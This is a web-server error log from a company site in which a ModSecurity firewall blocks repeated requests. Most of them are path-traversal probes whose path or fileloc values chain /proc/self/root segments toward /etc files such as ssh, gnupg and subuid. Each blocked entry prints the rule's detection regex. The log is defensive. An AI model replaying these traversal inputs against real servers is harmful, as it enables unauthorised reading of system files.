[Wed Mar 18 09:18:12.414123 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.244.43:35746] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqYBAkwaGbbGflqUZABTgAAAM8"]
[Wed Mar 18 09:18:12.531061 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:46220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYBOyqAr6etmhZHNqvcwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:13.431466 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.228.61:33600] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqYBeoXxyEfFpUF8f9fGQAAAUg"]
[Wed Mar 18 09:18:19.520594 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:39594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYC_u8EFLIOrSqIpv2BQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:20.767346 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:39018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYDMdf6f5d65gmYZTFfwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:22.119641 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:39022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYDkzinOy1jxa1j4cFPAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:24.706550 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:39034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYEOyqAr6etmhZHNqvhwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:26.007596 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:39036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYEtY0UrI5A3LftIyUhgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:28.539991 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:39040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYFPu8EFLIOrSqIpv2CwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:29.838303 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:55872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYFUzinOy1jxa1j4cFRQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:31.215393 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:55888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYF8df6f5d65gmYZTFgwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:19:02.080452 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:34274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYNkzinOy1jxa1j4cFagAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:19:26.319695 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:60566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYTimAPhZkrhU8w4leYAAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:19:31.897680 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:37246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYU-yqAr6etmhZHNqvugAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:20:03.374905 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:37258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYc-w_le52K8_3pV3QrAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:20:20.157400 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:46662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYhPu8EFLIOrSqIpv2QwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:20:35.724654 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:50502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYk-yqAr6etmhZHNqwFQAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:21:17.324358 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.241.31:39586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYvUzinOy1jxa1j4cF2QAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:21:28.707584 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:46170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqYyNY0UrI5A3LftIyU_QAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:22:04.501871 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:36760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY7AkwaGbbGflqUZAB2gAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:05.961294 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:41570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY7dY0UrI5A3LftIyVPQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:07.251248 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:41574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY7wkwaGbbGflqUZAB3gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:08.540803 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:41590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY8Na6ubjKNq_cu4aKdgAAA0E"], referer: 